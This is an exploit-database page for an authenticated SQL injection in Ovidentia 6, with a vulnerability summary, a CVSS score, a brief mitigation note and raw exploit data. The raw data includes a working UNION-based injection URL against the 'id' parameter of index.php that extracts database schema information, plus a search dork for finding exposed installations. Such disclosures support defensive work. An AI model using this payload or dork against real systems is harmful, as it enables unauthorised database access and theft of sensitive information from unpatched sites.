header-logo
Suggest Exploit
vendor:
Ovidentia
by:
Felipe Prates Donato (m4ud)
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ovidentia
Affected Version From: 6
Affected Version To: 6
Patch Exists: No
Related CWE: N/A
CPE: ovidentia:ovidentia:6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

Ovidentia 6 – ‘id’ SQL injection (Authenticated)

This exploit allows an authenticated user to inject arbitrary SQL commands into the 'id' parameter of the 'index.php' page of Ovidentia 6. By exploiting this vulnerability, an attacker can gain access to the database and extract sensitive information.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries and input validation.
Source

Exploit-DB raw data:

# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
# Exploit Author: Felipe Prates Donato (m4ud)
# Vendor Homepage: http://www.ovidentia.org
# Version: 6
# DORK : "Powered by Ovidentia"    

http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--

Navigation

Suggest Exploit

Services By CQR